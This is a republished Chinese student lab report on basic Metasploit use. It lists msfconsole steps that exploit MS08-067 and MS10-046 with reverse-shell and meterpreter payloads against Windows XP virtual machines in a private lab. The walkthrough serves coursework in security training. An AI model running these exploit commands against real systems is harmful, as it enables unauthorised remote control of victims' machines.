码迷,mamicode.com
首页 > 其他好文 > 详细

2018-2019-2 20165334『网络对抗技术』Exp5:MSF基础应用

时间:2019-04-13 19:13:54      阅读:134      评论:0      收藏:0      [点我收藏+]

标签:两台   ESS   cut   windows   .com   一个   内容   adobe   进入   

2018-2019-2 20165334『网络对抗技术』Exp5:MSF基础应用

一.原理与实践说明

1.实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
  • 一个主动攻击实践,如ms08-067; (1分)

  • 一个针对浏览器的攻击,如ms11-050;(1分)

  • 一个针对客户端的攻击,如Adobe;(1分)

  • 成功应用任何一个辅助模块。(0.5分)

    基础问题回答

  • exploit是利用漏洞,将攻击代码传送到靶机上,并对靶机进行一系列控制操作的整个过程。
  • payload就是需要传送到靶机上的攻击代码本身。

  • encode是对攻击代码进行完善,伪装,使其能正常运行并且尽量躲避AV的查杀

    二.实践过程记录

    1.Windows服务渗透攻击——MS08-067安全漏洞

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)

    实验步骤

  • 在kali终端中开启msfconsole。
  • 输入命令earch ms08_067,会显示出找到的渗透模块,如下图所示
    技术图片
  • 输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用
  • 输入show payloads查看攻击载荷
  • 技术图片
  • 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷
  • 输入命令show options显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分
  • 技术图片
  • 输入命令set LHOST 192.168.56.102
  • 输入命令set LHOST 192.168.56.133
  • 使用命令show options再次查看payload状态。
  • 技术图片
  • 输入命令exploit开始攻击,如下图所示是正常攻击成功结果
  • 技术图片

2.浏览器渗透攻击--ms10_046(靶机Windowsxp)

实验步骤(安照1的步骤)

  • 输入use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
  • 输入set payload windows/meterpreter/reverse_tcp
  • 查看要输入的参数show options
    技术图片
  • 输入set LHOST 192.168.56.134
  • 开始攻击exploit
  • 技术图片
  • http://192.168.56.134:80/在靶机winxp中打开
  • 技术图片
  • 查看会话
  • 技术图片
  • 输入sessions -i 1即可选择第一个会话,然后就攻击成功
  • 技术图片

2018-2019-2 20165334『网络对抗技术』Exp5:MSF基础应用

标签:两台   ESS   cut   windows   .com   一个   内容   adobe   进入   

原文地址:https://www.cnblogs.com/ltl123/p/10702227.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!